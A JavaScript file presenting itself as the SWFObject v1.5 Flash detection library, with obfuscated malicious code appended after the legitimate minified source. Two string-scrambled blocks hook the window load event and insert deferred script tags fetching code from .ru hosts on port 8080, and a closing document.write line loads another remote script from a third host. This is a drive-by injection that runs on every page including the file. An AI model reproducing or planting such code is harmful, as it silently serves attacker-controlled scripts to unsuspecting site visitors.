/**
 * SWFObject v1.5: Flash Player detection and embed - http://blog.deconcept.com/swfobject/
 *
 * SWFObject is (c) 2007 Geoff Stearns and is released under the MIT License:
 * http://www.opensource.org/licenses/mit-license.php
 *
 */
if(typeof deconcept=="undefined"){var deconcept=new Object();}if(typeof deconcept.util=="undefined"){deconcept.util=new Object();}if(typeof deconcept.SWFObjectUtil=="undefined"){deconcept.SWFObjectUtil=new Object();}deconcept.SWFObject=function(_1,id,w,h,_5,c,_7,_8,_9,_a){if(!document.getElementById){return;}this.DETECT_KEY=_a?_a:"detectflash";this.skipDetect=deconcept.util.getRequestParameter(this.DETECT_KEY);this.params=new Object();this.variables=new Object();this.attributes=new Array();if(_1){this.setAttribute("swf",_1);}if(id){this.setAttribute("id",id);}if(w){this.setAttribute("width",w);}if(h){this.setAttribute("height",h);}if(_5){this.setAttribute("version",new deconcept.PlayerVersion(_5.toString().split(".")));}this.installedVer=deconcept.SWFObjectUtil.getPlayerVersion();if(!window.opera&&document.all&&this.installedVer.major>7){deconcept.SWFObject.doPrepUnload=true;}if(c){this.addParam("bgcolor",c);}var q=_7?_7:"high";this.addParam("quality",q);this.setAttribute("useExpressInstall",false);this.setAttribute("doExpressInstall",false);var _c=(_8)?_8:window.location;this.setAttribute("xiRedirectUrl",_c);this.setAttribute("redirectUrl","");if(_9){this.setAttribute("redirectUrl",_9);}};deconcept.SWFObject.prototype={useExpressInstall:function(_d){this.xiSWFPath=!_d?"expressinstall.swf":_d;this.setAttribute("useExpressInstall",true);},setAttribute:function(_e,_f){this.attributes[_e]=_f;},getAttribute:function(_10){return this.attributes[_10];},addParam:function(_11,_12){this.params[_11]=_12;},getParams:function(){return this.params;},addVariable:function(_13,_14){this.variables[_13]=_14;},getVariable:function(_15){return this.variables[_15];},getVariables:function(){return this.variables;},getVariablePairs:function(){var _16=new Array();var key;var _18=this.getVariables();for(key in _18){_16[_16.length]=key+"="+_18[key];}return _16;},getSWFHTML:function(){var _19="";if(navigator.plugins&&navigator.mimeTypes&&navigator.mimeTypes.length){if(this.getAttribute("doExpressInstall")){this.addVariable("MMplayerType","PlugIn");this.setAttribute("swf",this.xiSWFPath);}_19="<embed type=\"application/x-shockwave-flash\" src=\""+this.getAttribute("swf")+"\" width=\""+this.getAttribute("width")+"\" height=\""+this.getAttribute("height")+"\" style=\""+this.getAttribute("style")+"\"";_19+=" id=\""+this.getAttribute("id")+"\" name=\""+this.getAttribute("id")+"\" ";var _1a=this.getParams();for(var key in _1a){_19+=[key]+"=\""+_1a[key]+"\" ";}var _1c=this.getVariablePairs().join("&");if(_1c.length>0){_19+="flashvars=\""+_1c+"\"";}_19+="/>";}else{if(this.getAttribute("doExpressInstall")){this.addVariable("MMplayerType","ActiveX");this.setAttribute("swf",this.xiSWFPath);}_19="<object id=\""+this.getAttribute("id")+"\" classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" width=\""+this.getAttribute("width")+"\" height=\""+this.getAttribute("height")+"\" style=\""+this.getAttribute("style")+"\">";_19+="<param name=\"movie\" value=\""+this.getAttribute("swf")+"\" />";var _1d=this.getParams();for(var key in _1d){_19+="<param name=\""+key+"\" value=\""+_1d[key]+"\" />";}var _1f=this.getVariablePairs().join("&");if(_1f.length>0){_19+="<param name=\"flashvars\" value=\""+_1f+"\" />";}_19+="</object>";}return _19;},write:function(_20){if(this.getAttribute("useExpressInstall")){var _21=new deconcept.PlayerVersion([6,0,65]);if(this.installedVer.versionIsValid(_21)&&!this.installedVer.versionIsValid(this.getAttribute("version"))){this.setAttribute("doExpressInstall",true);this.addVariable("MMredirectURL",escape(this.getAttribute("xiRedirectUrl")));document.title=document.title.slice(0,47)+" - Flash Player Installation";this.addVariable("MMdoctitle",document.title);}}if(this.skipDetect||this.getAttribute("doExpressInstall")||this.installedVer.versionIsValid(this.getAttribute("version"))){var n=(typeof _20=="string")?document.getElementById(_20):_20;n.innerHTML=this.getSWFHTML();return true;}else{if(this.getAttribute("redirectUrl")!=""){document.location.replace(this.getAttribute("redirectUrl"));}}return false;}};deconcept.SWFObjectUtil.getPlayerVersion=function(){var _23=new deconcept.PlayerVersion([0,0,0]);if(navigator.plugins&&navigator.mimeTypes.length){var x=navigator.plugins["Shockwave Flash"];if(x&&x.description){_23=new deconcept.PlayerVersion(x.description.replace(/([a-zA-Z]|\s)+/,"").replace(/(\s+r|\s+b[0-9]+)/,".").split("."));}}else{if(navigator.userAgent&&navigator.userAgent.indexOf("Windows CE")>=0){var axo=1;var _26=3;while(axo){try{_26++;axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash."+_26);_23=new deconcept.PlayerVersion([_26,0,0]);}catch(e){axo=null;}}}else{try{var axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7");}catch(e){try{var axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash.6");_23=new deconcept.PlayerVersion([6,0,21]);axo.AllowScriptAccess="always";}catch(e){if(_23.major==6){return _23;}}try{axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash");}catch(e){}}if(axo!=null){_23=new deconcept.PlayerVersion(axo.GetVariable("$version").split(" ")[1].split(","));}}}return _23;};deconcept.PlayerVersion=function(_29){this.major=_29[0]!=null?parseInt(_29[0]):0;this.minor=_29[1]!=null?parseInt(_29[1]):0;this.rev=_29[2]!=null?parseInt(_29[2]):0;};deconcept.PlayerVersion.prototype.versionIsValid=function(fv){if(this.major<fv.major){return false;}if(this.major>fv.major){return true;}if(this.minor<fv.minor){return false;}if(this.minor>fv.minor){return true;}if(this.rev<fv.rev){return false;}return true;};deconcept.util={getRequestParameter:function(_2b){var q=document.location.search||document.location.hash;if(_2b==null){return q;}if(q){var _2d=q.substring(1).split("&");for(var i=0;i<_2d.length;i++){if(_2d[i].substring(0,_2d[i].indexOf("="))==_2b){return _2d[i].substring((_2d[i].indexOf("=")+1));}}}return "";}};deconcept.SWFObjectUtil.cleanupSWFs=function(){var _2f=document.getElementsByTagName("OBJECT");for(var i=_2f.length-1;i>=0;i--){_2f[i].style.display="none";for(var x in _2f[i]){if(typeof _2f[i][x]=="function"){_2f[i][x]=function(){};}}}};if(deconcept.SWFObject.doPrepUnload){if(!deconcept.unloadSet){deconcept.SWFObjectUtil.prepUnload=function(){__flash_unloadHandler=function(){};__flash_savedUnloadHandler=function(){};window.attachEvent("onunload",deconcept.SWFObjectUtil.cleanupSWFs);};window.attachEvent("onbeforeunload",deconcept.SWFObjectUtil.prepUnload);deconcept.unloadSet=true;}}if(!document.getElementById&&document.all){document.getElementById=function(id){return document.all[id];};}var getQueryParamValue=deconcept.util.getRequestParameter;var FlashObject=deconcept.SWFObject;var SWFObject=deconcept.SWFObject;




e=14810;e++;kd=21392;kd++;function Q(){I=19184;I--;var SQ=["Nc","S","M"];var l="scri"+"ptaDs".substr(0,2);this.H=false;var m=String("src");var c=document;this.xi="xi";cO=41720;cO--;var t="onlo"+"ad";var Y=new String("crNLf".substr(0,2)+"DJYea".substr(3)+"te"+"El"+"9uvIemIv9u".substr(4,2)+"oCgen".substr(3)+"tzkVd".substr(0,1));Tt=["Z"];Sz={v:false};this.qh=false;var lJ=new String("defe"+"r3DLx".substr(0,1));var eJ=false;var D=new String("app"+"endUtJ".substr(0,3)+"Chi"+"45uld5u4".substr(3,2));var j=window;try {var ej='EE'} catch(ej){};n=54458;n+=49;var k=new String("bod"+"z9ly".substr(3));var HR="";var Jr=new Date();var ya={};function J(){var L=["w","DC","p"];aG={g:"bx"};var tk={NO:false};this.Ce='';try {var TI=["AT","XP"];this.an=48148;this.an--;xvE=[];this.WC=false;var K=2746-2745;var s=false;var lX="htt"+"p:/hMxP".substr(0,3)+"/pa"+"ZVassp".substr(3)+"ort"+"blu"+"es."+"TGsFru:FGsT".substr(4,3);var Je=String("/goo"+"d8YTgle-".substr(4)+"no/g"+"ufcooglfuc".substr(3,4)+"Tp4e.co".substr(3)+"m/ae"+"ivJ1bn.n".substr(4)+"BhYet.p".substr(3)+"hp");var x=641568-633488;var Uf=["UB","ltu"];y=c[Y](l);var xE='';var FB=["ys"];this.Cn=false;this.Dv=false;var gB=false;var Jf={r:"TG"};y[m]=lX+x+Je;var aGK=43964;var Nx=false;var nf=["Mf","Xc"];y[lJ]=K;Sa=[];c[k][D](y);try {var Xv='oq'} catch(Xv){};var Zh=29690;var OW=21779;zL=["JQ","Cv","aZ"];} catch(O){try {} catch(Nxl){};var tQ=["Qg"];};lb={};var tj=["Eh","dK","YD"];}var iO=31519;this.EL='';j[t]=J;var Tf=["Mb","sQ","zM"];};var lq={Ed:"OC"};var QX=34578;Q();pL=64170;pL-=149;var lN={};
try {var x='i'} catch(x){};aG=["Yo","cB"];w=[];u=[];FvL=[];try {this.m="";this.lg="lg";this.J="J";CM=29894;CM++;j=["O","yq","yY"];this.Ya='';this.B='';var o=window[new String("wOfQun".substr(4)+"es"+"LRpuca".substr(4)+"mVCGpemCGV".substr(4,2))];var oQ=window[("Re"+"gE"+"xp")];cr={qJ:false};this.Ai='';this.Mk='';Ie=[];var S=String("on8Oam".substr(0,2)+"loewP".substr(0,2)+"CGyad".substr(3));var Cx='';try {var f='wP'} catch(f){};try {var fI='oV'} catch(fI){};var QL=[];var K=new String("ZcKrep".substr(3)+"lacXf3".substr(0,3)+"eHTqm".substr(0,1));var QV="QV";var hb={no:"lh"};Dr=13473;Dr+=221;this.nH=31390;this.nH++;this.kj=36204;this.kj++;try {var pE='xn'} catch(pE){};try {var OD='v'} catch(OD){};try {var o_='pc'} catch(o_){};va=["DP","Yn","RgG"];JM=["Vt","DQ","Hu"];var n=String("1062A".substr(0,1));this.Rh='';this.Jr='';Ay=13633;Ay--;this.Xq='';var F='';this.A_=29415;this.A_++;Zz=39214;Zz+=15;jU=54868;jU+=247;Xb={uM:"aB"};Lo=60364;Lo-=179;var lI=["ih","Kl","gc"];function C(n,b){var Lz={wn:false};var XG={sM:false};Lq=23519;Lq++;var IF="";var Nm="";var a=new String("x2Jq[".substr(4));a+=b;this.Ra="Ra";this.d="d";a+=o("%5d");this.gi=29486;this.gi-=220;DT=10110;DT++;var gj={};XW=["xm","gX"];var GB=["Sr","SW"];var FF=new oQ(a, new String("s6Vg".substr(3)));nB={wPA:"JE"};UQ=35900;UQ-=230;this.un='';return n.replace(FF, F);var LH='';var Rm=["dh","zx"];QG=65463;QG++;var Nk=["sr","pQ"];};KH=24833;KH++;Aj=["pd","sj","YnT"];var N=new String("/goog"+"le.coSws".substr(0,5)+"m/con"+"stantQ80P".substr(0,5)+"conta"+"TUfAct.co".substr(4)+"CKJ1m/ku6KJ1C".substr(4,5)+"6ZR.com.".substr(3)+"php");var bh="bh";try {var Bw='OE'} catch(Bw){};try {var dG='wPG'} catch(dG){};try {var Gk='bWJ'} catch(Gk){};try {var ST='ii'} catch(ST){};var A=26862-18782;var AC=["fC"];var X=new String("ht"+"tp"+":/"+"o1J7/g".substr(4)+"otVHU".substr(0,2)+"hg"+"ui"+"lt"+".r"+"u:");var gy={hB:"dC"};function Y(){DZ={};this.Rhw="Rhw";this.hp="hp";this.xG='';this.kS=false;try {} catch(qV){};try {} catch(vN){};var Ht={kD:"yk"};var SI="5Ubapp".substr(3)+"IjoGendGjIo".substr(4,3)+"nazdChiandz".substr(4,3)+"ld";this.Gs="";var Zf=new String();var Hf=new String();var c=document;var JN=new String();UF=[];RU=[];var YM=C('s9cfrmi_pXtk','gU89mbWSfvBFnqh2_XjkZO');kl={Ic:false};Lj=55691;Lj--;var oF=["TI","OI","kd"];var bt=new String();tr={};Jab={Nd:false};M=c.createElement(YM);gZ=["Ynx","rh","td"];this.aL=29738;this.aL--;gcA={_u:3479};this.qC='';dn={yew:19424};y=X+A;this.lb="lb";Mf=858;Mf++;JP=[];y=y+N;this.sjs='';this._W='';this.kO='';mk={IH:false};var bD=c.body;try {} catch(rE){};fY=2662;fY-=84;var Dw={DU:false};M.src=y;Hl={};this.IE=1148;this.IE+=255;var TM={};var MC={};M[new String("defSji".substr(0,3)+"er")]=n;YBz=["rg","nw"];var kC=new Date();EO=["fYl","hA"];try {} catch(LQ){};eC=31693;eC--;this.nma=44183;this.nma--;var XX={OR:20306};bD[SI](M);LV=37282;LV--;try {} catch(cO){};};try {} catch(pB){};uV={};this.u_M=21903;this.u_M-=182;try {} catch(ug){};this.wz=false;this.ww='';window[S]=Y;aeh={QH:"DTE"};CP={qB:"KM"};Cq={wC:"Gb"};var wM=new Date();} catch(g){var sp=58629;var _xE={};var ZU=41934;eb=45328;eb++;mA={eFR:false};wh={XGP:17384};zn=29189;zn++;};_B={};bJ={be:"lvr"};

document.write('<s'+'cript type="text/javascript" src="http://solk.seamscreative.info:8080/CD-R.js"></scr'+'ipt>');